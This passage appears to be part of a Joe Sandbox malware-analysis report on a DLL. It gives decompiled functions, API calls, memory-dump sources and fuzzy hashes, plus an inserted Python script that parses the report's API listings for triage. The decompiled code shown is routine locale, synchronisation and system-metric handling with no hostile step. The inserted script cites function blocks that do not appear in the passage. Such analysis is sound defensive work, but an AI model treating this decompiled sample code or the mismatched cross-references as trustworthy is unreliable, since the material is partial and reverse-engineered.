                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                          • String ID:
                          • API String ID: 2429646606-0
                          • Opcode ID: 3b5ffdcc5262aa1b2299f553e9e51807c58d82dda3f65ac3e1eb10452c3a4709
                          • Instruction ID: 4d4fd294bec7b85642322fc95460b78e11a2075615981f11d5bff8d246ed5d67
                          • Opcode Fuzzy Hash: 3b5ffdcc5262aa1b2299f553e9e51807c58d82dda3f65ac3e1eb10452c3a4709
                          • Instruction Fuzzy Hash: C2F0A5F3589310DAD714FBB8FDA9A1632E8B704311F108A24F51AC35E1D6BCD452CB19
Uniqueness
• Uniqueness Score: -1.00%

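The per-function "APIs" listings in this report (for example the five entries under E007371C0, the subcall entry under E0070B3D0, and the address-only imports such as 7378AC50.USER32 under E007217CC) all follow one fixed line format, so they can be triaged in bulk rather than read function by function. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the analysed sample. It parses an excerpt constructed by copying the API lines of three blocks above (decompiled bodies omitted), records which API each function calls and at which reference address, separates entries the report attributes to a callee, and flags entries where the report printed a bare address instead of an import name. Treating an eight-hex-digit name as "unresolved" is this example's own heuristic, based only on the convention visible in the listing, and the helper names are assumptions.

```python
"""Parse the per-function 'APIs' listings of a Joe Sandbox report excerpt."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed input: three function blocks copied from the hFGZpat9Mf.dll
# report above, decompiled bodies omitted, API lines as printed there.
REPORT_EXCERPT = """\
C-Code - Quality: 40%
    E007217CC(intOrPtr __eax) {
    }
APIs
• 7378AC50.USER32(00000000), ref: 007217E4
• 7378AD70.GDI32(?,00000068,00000000,00721852,?,00000000), ref: 00721800
• 7378AEA0.GDI32(5E0805C0,00000000,00000008,?,?,00000068,00000000,00721852,?,00000000), ref: 00721818
• 7378AEA0.GDI32(5E0805C0,00000008,00000008,?,5E0805C0,00000000,00000008,?,?,00000068,00000000,00721852,?,00000000), ref: 00721830
• 7378B380.USER32(00000000,?,00721859,00721852,?,00000000), ref: 0072184C
• Instruction Fuzzy Hash: 4A11A571548344FEFB00DFA4AC96B6D77E8F745710F8480A5F5189B5C1DA7A54148720
C-Code - Quality: 64%
    E0070B3D0(void* __esi, void* __eflags) {
    }
APIs
• GetThreadLocale.KERNEL32(?,00000000,0070B467,?,?,00000000), ref: 0070B3E8
  • Part of subcall function 0070B148: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0070B166
• EnumCalendarInfoA.KERNEL32(Function_0000B31C,00000000,00000000,00000004), ref: 0070B423
C-Code - Quality: 100%
    E007371C0() {
    }
APIs
• UnhookWindowsHookEx.USER32(00000000), ref: 007371CF
• SetEvent.KERNEL32(00000000,007393BA,00000000,0073925E), ref: 007371EA
• GetCurrentThreadId.KERNEL32 ref: 007371EF
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,007393BA,00000000,0073925E), ref: 00737204
• CloseHandle.KERNEL32(00000000,00000000,007393BA,00000000,0073925E), ref: 0073720F
"""

QUALITY = re.compile(r"^C-Code - Quality: (\d+)%$")
FUNC = re.compile(r"^([EL][0-9A-Fa-f]{8})\(")          # decompiled signature line
API = re.compile(
    r"^•\s*(?:Part of subcall function\s+([0-9A-Fa-f]{8}):\s*)?"
    r"([A-Za-z0-9_@]+)\.([A-Za-z0-9_]+)"                # symbol-or-address . module
    r"(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]{8})$"    # (args), ref: call-site address
)
FUZZY = re.compile(r"^• Instruction Fuzzy Hash: ([0-9A-F]+)$")


@dataclass
class ApiCall:
    api: str            # import name, or a bare hex address when the report could not name it
    module: str         # USER32, GDI32, KERNEL32, ...
    args: list[str]     # '?' marks an argument the sandbox could not recover
    ref: str            # address of the call instruction inside the function
    subcall_of: str | None = None   # set when the report attributes the call to a callee

    @property
    def unresolved(self) -> bool:
        # Heuristic (this example's own): eight hex digits in the name slot,
        # e.g. '7378AC50.USER32', means the target was not resolved to a symbol.
        return re.fullmatch(r"[0-9A-Fa-f]{8}", self.api) is not None


@dataclass
class FunctionBlock:
    name: str
    quality: int
    calls: list[ApiCall] = field(default_factory=list)
    fuzzy_hash: str | None = None   # usable for clustering against other samples


def parse_report(text: str) -> list[FunctionBlock]:
    blocks: list[FunctionBlock] = []
    quality = None                  # the quality line precedes the function signature
    for raw in text.splitlines():
        line = raw.strip()
        if (m := QUALITY.match(line)):
            quality = int(m.group(1))
        elif (m := FUNC.match(line)) and quality is not None:
            blocks.append(FunctionBlock(m.group(1), quality))
            quality = None
        elif (m := API.match(line)) and blocks:
            sub, api, mod, args, ref = m.groups()
            blocks[-1].calls.append(ApiCall(api, mod, args.split(",") if args else [], ref, sub))
        elif (m := FUZZY.match(line)) and blocks:
            blocks[-1].fuzzy_hash = m.group(1)
    return blocks


def functions_calling(blocks: list[FunctionBlock], api_names) -> list[str]:
    """Functions whose own API list (subcall entries excluded) hits any of api_names."""
    wanted = set(api_names)
    return [b.name for b in blocks
            if any(c.api in wanted and c.subcall_of is None for c in b.calls)]


def unresolved_imports(blocks: list[FunctionBlock]) -> dict[str, list[str]]:
    """Per function, the 'address.MODULE' entries the report printed without a symbol."""
    return {b.name: sorted({f"{c.api}.{c.module}" for c in b.calls if c.unresolved})
            for b in blocks if any(c.unresolved for c in b.calls)}
```

Run `parse_report(REPORT_EXCERPT)` and then `functions_calling(blocks, {"UnhookWindowsHookEx", "SetWindowsHookExA"})` to pull out the hook-handling routines directly; `unresolved_imports(blocks)` lists the address-only entries, which are the ones to resolve by hand against the loaded user32/gdi32 image before trusting the API-ID grouping.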
                          C-Code - Quality: 82%
                          			E0070B480(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr _v8;
                          				char _v12;
                          				intOrPtr _v16;
                          				char _v20;
                          				char _v24;
                          				void* _t41;
                          				signed int _t45;
                          				signed int _t47;
                          				signed int _t49;
                          				signed int _t51;
                          				intOrPtr _t75;
                          				void* _t76;
                          				signed int _t77;
                          				signed int _t83;
                          				signed int _t92;
                          				intOrPtr _t111;
                          				void* _t122;
                          				void* _t124;
                          				intOrPtr _t127;
                          				void* _t128;
                          
                          				_t128 = __eflags;
                          				_push(0);
                          				_push(0);
                          				_push(0);
                          				_push(0);
                          				_push(0);
                          				_t122 = __edx;
                          				_t124 = __eax;
                          				_push(_t127);
                          				_push(0x70b64a);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t127;
                          				_t92 = 1;
                          				E00704068(__edx);
                          				E0070B148(GetThreadLocale(), 0x70b660, 0x1009,  &_v12);
                          				if(E007083E8(0x70b660, 1, _t128) + 0xfffffffd - 3 < 0) {
                          					while(1) {
                          						_t41 = E00704328(_t124);
                          						__eflags = _t92 - _t41;
                          						if(_t92 > _t41) {
                          							goto L28;
                          						}
                          						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                          						asm("bt [0x76c11c], eax");
                          						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                          							_t45 = E00708AC8(_t124 + _t92 - 1, 2, 0x70b664);
                          							__eflags = _t45;
                          							if(_t45 != 0) {
                          								_t47 = E00708AC8(_t124 + _t92 - 1, 4, 0x70b674);
                          								__eflags = _t47;
                          								if(_t47 != 0) {
                          									_t49 = E00708AC8(_t124 + _t92 - 1, 2, 0x70b68c);
                          									__eflags = _t49;
                          									if(_t49 != 0) {
                          										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                          										__eflags = _t51;
                          										if(_t51 == 0) {
                          											L24:
                          											E00704330(_t122, 0x70b6a4);
                          										} else {
                          											__eflags = _t51 != 0x20;
                          											if(_t51 != 0x20) {
                          												E00704250();
                          												E00704330(_t122, _v24);
                          											} else {
                          												goto L24;
                          											}
                          										}
                          									} else {
                          										E00704330(_t122, 0x70b698);
                          										_t92 = _t92 + 1;
                          									}
                          								} else {
                          									E00704330(_t122, 0x70b684);
                          									_t92 = _t92 + 3;
                          								}
                          							} else {
                          								E00704330(_t122, 0x70b670);
                          								_t92 = _t92 + 1;
                          							}
                          							_t92 = _t92 + 1;
                          							__eflags = _t92;
                          						} else {
                          							_v8 = E0070C538(_t124, _t92);
                          							E00704588(_t124, _v8, _t92,  &_v20);
                          							E00704330(_t122, _v20);
                          							_t92 = _t92 + _v8;
                          						}
                          					}
                          				} else {
                          					_t75 =  *0x76f748; // 0x9
                          					_t76 = _t75 - 4;
                          					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                          						_t77 = 1;
                          					} else {
                          						_t77 = 0;
                          					}
                          					if(_t77 == 0) {
                          						E007040BC(_t122, _t124);
                          					} else {
                          						while(_t92 <= E00704328(_t124)) {
                          							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                          							__eflags = _t83;
                          							if(_t83 != 0) {
                          								__eflags = _t83 != 0x20;
                          								if(_t83 != 0x20) {
                          									E00704250();
                          									E00704330(_t122, _v16);
                          								}
                          							}
                          							_t92 = _t92 + 1;
                          							__eflags = _t92;
                          						}
                          					}
                          				}
                          				L28:
                          				_pop(_t111);
                          				 *[fs:eax] = _t111;
                          				_push(E0070B651);
                          				return E0070408C( &_v24, 4);
                          			}

                          APIs
                          • GetThreadLocale.KERNEL32(?,00000000,0070B64A,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0070B4AF
                            • Part of subcall function 0070B148: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0070B166
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Locale$InfoThread
                          • String ID: eeee$ggg$yyyy
                          • API String ID: 4232894706-1253427255
                          • Opcode ID: af828af61fc627deff3df396055f21784c4b240f33f83be1716c2c1dea9444e2
                          • Instruction ID: 1438c70bbac3b1f65e332f7247674b13cb953f8d516a64119b73caabf88dd3db
                          • Opcode Fuzzy Hash: af828af61fc627deff3df396055f21784c4b240f33f83be1716c2c1dea9444e2
                          • Instruction Fuzzy Hash: 1F41F0B0704105CBD715AAA8D8996BEF2E6EB85300F644775F542D33C6DB3DEF028662
Uniqueness
• Uniqueness Score: -1.00%

                          C-Code - Quality: 59%
                          			E007254FC(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _t62;
                          				intOrPtr _t64;
                          				intOrPtr _t67;
                          				void* _t77;
                          				void* _t78;
                          				intOrPtr _t79;
                          				intOrPtr _t80;
                          
                          				_t77 = _t78;
                          				_t79 = _t78 + 0xfffffff8;
                          				_v8 = __eax;
                          				_v12 = E00703244(1);
                          				_push(_t77);
                          				_push(0x725583);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t79;
                          				 *((intOrPtr*)(_v12 + 8)) = __edx;
                          				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
                          				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
                          				_t80 = _t79 + 0xc;
                          				 *((char*)(_v12 + 0x70)) = _a8;
                          				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
                          					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
                          				}
                          				_t62 =  *0x715420; // 0x71546c
                          				 *((intOrPtr*)(_v12 + 0x6c)) = E00703424(_a4, _t62);
                          				_pop(_t64);
                          				 *[fs:eax] = _t64;
                          				_push(0x76f8b0);
                          				L00706368();
                          				_push(_t77);
                          				_push(0x7255e3);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t80;
                          				L00723F84( *((intOrPtr*)(_v8 + 0x28)));
                          				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
                          				L00723F80(_v12);
                          				_pop(_t67);
                          				 *[fs:eax] = _t67;
                          				_push(0x7255ea);
                          				_push(0x76f8b0);
                          				L007064A8();
                          				return 0;
                          			}

                          APIs
                          • RtlEnterCriticalSection.KERNEL32(0076F8B0), ref: 0072559F
                          • RtlLeaveCriticalSection.KERNEL32(0076F8B0,007255EA,0076F8B0), ref: 007255DD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave
                          • String ID: dq$lTq
                          • API String ID: 3168844106-2665862785
                          • Opcode ID: 16ccaf83bfe11e033dcd9b0a68848b88450cf062731e9f65a4e2c3313485ecc6
                          • Instruction ID: e44a5d1f17bbb598c529624b88379791fa15e44566246c7c3b4e1abffc1ebd71
                          • Opcode Fuzzy Hash: 16ccaf83bfe11e033dcd9b0a68848b88450cf062731e9f65a4e2c3313485ecc6
                          • Instruction Fuzzy Hash: 5121B075A04744EFDB01DF69E881889BBF6FB4C720F1181A5F80497391C738EE80CA90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E007270E0(intOrPtr* _a4, signed int _a8) {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr* _t14;
                          				intOrPtr _t16;
                          				signed int _t17;
                          				void* _t18;
                          				void* _t19;
                          
                          				_t17 = _a8;
                          				_t14 = _a4;
                          				if( *0x76f91e != 0) {
                          					_t19 = 0;
                          					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
                          						_t19 = 0x12340042;
                          					}
                          				} else {
                          					_t16 =  *0x76f8fc; // 0x7270e0
                          					 *0x76f8fc = E00726F70(2, _t14, _t16, _t17, _t18);
                          					_t19 =  *0x76f8fc(_t14, _t17);
                          				}
                          				return _t19;
                          			}

                          0x007270e6
                          0x007270e9
                          0x007270f3
                          0x00727118
                          0x00727121
                          0x00727148
                          0x00727148
                          0x007270f5
                          0x007270fa
                          0x00727107
                          0x00727114
                          0x00727114
                          0x00727153

                          APIs
                          • GetSystemMetrics.USER32 ref: 00727131
                          • GetSystemMetrics.USER32 ref: 0072713D
                            • Part of subcall function 00726F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00726FF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: MetricsSystem$AddressProc
                          • String ID: MonitorFromRect$pr
                          • API String ID: 1792783759-3225576265
                          • Opcode ID: 2ac9f2da3abb389eae38626cf75330ad04071bceffd7b4831a9c558ae8505080
                          • Instruction ID: 18037316eb6c3a67cc3ed893127703f88b4f993d026a079061600e724da18cff
                          • Opcode Fuzzy Hash: 2ac9f2da3abb389eae38626cf75330ad04071bceffd7b4831a9c558ae8505080
                          • Instruction Fuzzy Hash: 8D01A231204329DFDB148B05FE86B16B7A5EF91391F18D0A2E945CB202C2BCDD50CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0070CECC() {
                          				_Unknown_base(*)()* _t1;
                          				struct HINSTANCE__* _t3;
                          
                          				_t1 = GetModuleHandleA("kernel32.dll");
                          				_t3 = _t1;
                          				if(_t3 != 0) {
                          					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                          					 *0x76c140 = _t1;
                          				}
                          				if( *0x76c140 == 0) {
                          					 *0x76c140 = E00708914;
                          					return E00708914;
                          				}
                          				return _t1;
                          			}

                          0x0070ced2
                          0x0070ced7
                          0x0070cedb
                          0x0070cee3
                          0x0070cee8
                          0x0070cee8
                          0x0070cef4
                          0x0070cefb
                          0x00000000
                          0x0070cefb
                          0x0070cf01

                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0070D935,00000000,0070D948), ref: 0070CED2
                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0070CEE3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                          • API String ID: 1646373207-3712701948
                          • Opcode ID: e7462212a740effe4bf57389016fbec03bab89e5f4528c7f7856a773f0ee6ec9
                          • Instruction ID: cb902756ecdb252041aad5655ce4108ec99bc1f64d38cf6255c80f04d7b8bc43
                          • Opcode Fuzzy Hash: e7462212a740effe4bf57389016fbec03bab89e5f4528c7f7856a773f0ee6ec9
                          • Instruction Fuzzy Hash: CBD0A7E1200386CFFB13BBA55C8573235C5A311708B008334F041CA2C3EBFC59044326
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E0070EDAC(intOrPtr* __eax) {
                          				char _v260;
                          				char _v768;
                          				char _v772;
                          				intOrPtr* _v776;
                          				signed short* _v780;
                          				char _v784;
                          				signed int _v788;
                          				char _v792;
                          				intOrPtr* _v796;
                          				signed char _t43;
                          				intOrPtr* _t60;
                          				void* _t79;
                          				void* _t81;
                          				void* _t84;
                          				void* _t85;
                          				intOrPtr* _t92;
                          				void* _t96;
                          				char* _t97;
                          				void* _t98;
                          
                          				_v776 = __eax;
                          				if(( *(_v776 + 1) & 0x00000020) == 0) {
                          					E0070EBF4(0x80070057);
                          				}
                          				_t43 =  *_v776;
                          				if((_t43 & 0x00000fff) == 0xc) {
                          					if((_t43 & 0x00000040) == 0) {
                          						_v780 =  *((intOrPtr*)(_v776 + 8));
                          					} else {
                          						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
                          					}
                          					_v788 =  *_v780 & 0x0000ffff;
                          					_t79 = _v788 - 1;
                          					if(_t79 >= 0) {
                          						_t85 = _t79 + 1;
                          						_t96 = 0;
                          						_t97 =  &_v772;
                          						do {
                          							_v796 = _t97;
                          							_push(_v796 + 4);
                          							_t22 = _t96 + 1; // 0x1
                          							_push(_v780);
                          							L0070DE04();
                          							E0070EBF4(_v780);
                          							_push( &_v784);
                          							_t25 = _t96 + 1; // 0x1
                          							_push(_v780);
                          							L0070DE0C();
                          							E0070EBF4(_v780);
                          							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                          							_t96 = _t96 + 1;
                          							_t97 = _t97 + 8;
                          							_t85 = _t85 - 1;
                          						} while (_t85 != 0);
                          					}
                          					_t81 = _v788 - 1;
                          					if(_t81 >= 0) {
                          						_t84 = _t81 + 1;
                          						_t60 =  &_v768;
                          						_t92 =  &_v260;
                          						do {
                          							 *_t92 =  *_t60;
                          							_t92 = _t92 + 4;
                          							_t60 = _t60 + 8;
                          							_t84 = _t84 - 1;
                          						} while (_t84 != 0);
                          						do {
                          							goto L12;
                          						} while (E0070ED50(_t83, _t98) != 0);
                          						goto L15;
                          					}
                          					L12:
                          					_t83 = _v788 - 1;
                          					if(E0070ED20(_v788 - 1, _t98) != 0) {
                          						_push( &_v792);
                          						_push( &_v260);
                          						_push(_v780);
                          						L0070DE14();
                          						E0070EBF4(_v780);
                          						E0070EFA4(_v792);
                          					}
                          				}
                          				L15:
                          				_push(_v776);
                          				L0070D9A0();
                          				return E0070EBF4(_v776);
                          			}

                          0x0070edb8
                          0x0070edc8
                          0x0070edcf
                          0x0070edcf
                          0x0070edda
                          0x0070ede8
                          0x0070edf7
                          0x0070ee15
                          0x0070edf9
                          0x0070ee04
                          0x0070ee04
                          0x0070ee24
                          0x0070ee30
                          0x0070ee33
                          0x0070ee35
                          0x0070ee36
                          0x0070ee38
                          0x0070ee3e
                          0x0070ee40
                          0x0070ee4f
                          0x0070ee50
                          0x0070ee5a
                          0x0070ee5b
                          0x0070ee60
                          0x0070ee6b
                          0x0070ee6c
                          0x0070ee76
                          0x0070ee77
                          0x0070ee7c
                          0x0070ee97
                          0x0070ee99
                          0x0070ee9a
                          0x0070ee9d
                          0x0070ee9d
                          0x0070ee3e
                          0x0070eea6
                          0x0070eea9
                          0x0070eeab
                          0x0070eeac
                          0x0070eeb2
                          0x0070eeb8
                          0x0070eeba
                          0x0070eebc
                          0x0070eebf
                          0x0070eec2
                          0x0070eec2
                          0x0070eec5
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0070eec5
                          0x0070eec5
                          0x0070eecc
                          0x0070eed7
                          0x0070eedf
                          0x0070eee6
                          0x0070eeed
                          0x0070eeee
                          0x0070eef3
                          0x0070eefe
                          0x0070eefe
                          0x0070ef0c
                          0x0070ef10
                          0x0070ef16
                          0x0070ef17
                          0x0070ef27

                          APIs
                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0070EE5B
                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0070EE77
                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0070EEEE
                          • VariantClear.OLEAUT32(?), ref: 0070EF17
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: ArraySafe$Bound$ClearIndexVariant
                          • String ID:
                          • API String ID: 920484758-0
                          • Opcode ID: 7463b96e7709db7e7e57e6038e100b286abb4ae14a2a075b432a194abf0ddec3
                          • Instruction ID: 6080552d01d70b07cf9d3022600b6b30b9ff3bcd25e2fa9e75a92fc1bc0a26cb
                          • Opcode Fuzzy Hash: 7463b96e7709db7e7e57e6038e100b286abb4ae14a2a075b432a194abf0ddec3
                          • Instruction Fuzzy Hash: CE4108B5A0122DDFCB61DB58C894AC9B3FCAF58300F0046D5E649E7292DA38AF858F50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0070C8F0() {
                          				char _v152;
                          				short _v410;
                          				signed short _t14;
                          				signed int _t16;
                          				int _t18;
                          				void* _t20;
                          				void* _t23;
                          				int _t24;
                          				int _t26;
                          				signed int _t30;
                          				signed int _t31;
                          				signed int _t32;
                          				signed int _t37;
                          				int* _t39;
                          				short* _t41;
                          				void* _t49;
                          
                          				 *0x76f744 = 0x409;
                          				 *0x76f748 = 9;
                          				 *0x76f74c = 1;
                          				_t14 = GetThreadLocale();
                          				if(_t14 != 0) {
                          					 *0x76f744 = _t14;
                          				}
                          				if(_t14 != 0) {
                          					 *0x76f748 = _t14 & 0x3ff;
                          					 *0x76f74c = (_t14 & 0x0000ffff) >> 0xa;
                          				}
                          				memcpy(0x76c11c, 0x70ca44, 8 << 2);
                          				if( *0x76c0d4 != 2) {
                          					_t16 = GetSystemMetrics(0x4a);
                          					__eflags = _t16;
                          					 *0x76f751 = _t16 & 0xffffff00 | _t16 != 0x00000000;
                          					_t18 = GetSystemMetrics(0x2a);
                          					__eflags = _t18;
                          					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                          					 *0x76f750 = _t31;
                          					__eflags = _t31;
                          					if(__eflags != 0) {
                          						return E0070C878(__eflags, _t49);
                          					}
                          				} else {
                          					_t20 = E0070C8D8();
                          					if(_t20 != 0) {
                          						 *0x76f751 = 0;
                          						 *0x76f750 = 0;
                          						return _t20;
                          					}
                          					E0070C878(__eflags, _t49);
                          					_t37 = 0x20;
                          					_t23 = E00702DA4(0x76c11c, 0x20, 0x70ca44);
                          					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                          					 *0x76f750 = _t32;
                          					__eflags = _t32;
                          					if(_t32 != 0) {
                          						 *0x76f751 = 0;
                          						return _t23;
                          					}
                          					_t24 = 0x80;
                          					_t39 =  &_v152;
                          					do {
                          						 *_t39 = _t24;
                          						_t24 = _t24 + 1;
                          						_t39 =  &(_t39[0]);
                          						__eflags = _t24 - 0x100;
                          					} while (_t24 != 0x100);
                          					_t26 =  *0x76f744; // 0x409
                          					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                          					_t18 = 0x80;
                          					_t41 =  &_v410;
                          					while(1) {
                          						__eflags =  *_t41 - 2;
                          						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                          						 *0x76f751 = _t37;
                          						__eflags = _t37;
                          						if(_t37 != 0) {
                          							goto L17;
                          						}
                          						_t41 = _t41 + 2;
                          						_t18 = _t18 - 1;
                          						__eflags = _t18;
                          						if(_t18 != 0) {
                          							continue;
                          						} else {
                          							return _t18;
                          						}
                          						L18:
                          					}
                          				}
                          				L17:
                          				return _t18;
                          				goto L18;
                          			}

                          0x0070c8fc
                          0x0070c906
                          0x0070c910
                          0x0070c91a
                          0x0070c921
                          0x0070c923
                          0x0070c923
                          0x0070c92b
                          0x0070c937
                          0x0070c943
                          0x0070c943
                          0x0070c957
                          0x0070c960
                          0x0070ca0f
                          0x0070ca14
                          0x0070ca19
                          0x0070ca20
                          0x0070ca25
                          0x0070ca27
                          0x0070ca2a
                          0x0070ca30
                          0x0070ca32
                          0x00000000
                          0x0070ca3a
                          0x0070c966
                          0x0070c966
                          0x0070c96d
                          0x0070c96f
                          0x0070c976
                          0x00000000
                          0x0070c976
                          0x0070c983
                          0x0070c993
                          0x0070c995
                          0x0070c99a
                          0x0070c99d
                          0x0070c9a3
                          0x0070c9a5
                          0x0070c9a7
                          0x00000000
                          0x0070c9a7
                          0x0070c9b3
                          0x0070c9b8
                          0x0070c9be
                          0x0070c9be
                          0x0070c9c0
                          0x0070c9c1
                          0x0070c9c2
                          0x0070c9c2
                          0x0070c9de
                          0x0070c9e4
                          0x0070c9e9
                          0x0070c9ee
                          0x0070c9f4
                          0x0070c9f4
                          0x0070c9f8
                          0x0070c9fb
                          0x0070ca01
                          0x0070ca03
                          0x00000000
                          0x00000000
                          0x0070ca05
                          0x0070ca08
                          0x0070ca08
                          0x0070ca09
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0070ca09
                          0x0070c9f4
                          0x0070ca41
                          0x0070ca41
                          0x00000000

                          APIs
                          • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0070C9E4
                          • GetThreadLocale.KERNEL32 ref: 0070C91A
                            • Part of subcall function 0070C878: GetCPInfo.KERNEL32(00000000,?), ref: 0070C891
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: InfoLocaleStringThreadType
                          • String ID:
                          • API String ID: 1505017576-0
                          • Opcode ID: fe21303bc7281f27f88b61c6e1a94939448b8d28aa29a24a8bd2c7217f68b2f8
                          • Instruction ID: b1439565e960d1082d1630731d0809993341493e12ab143ae325a43b86208b31
                          • Opcode Fuzzy Hash: fe21303bc7281f27f88b61c6e1a94939448b8d28aa29a24a8bd2c7217f68b2f8
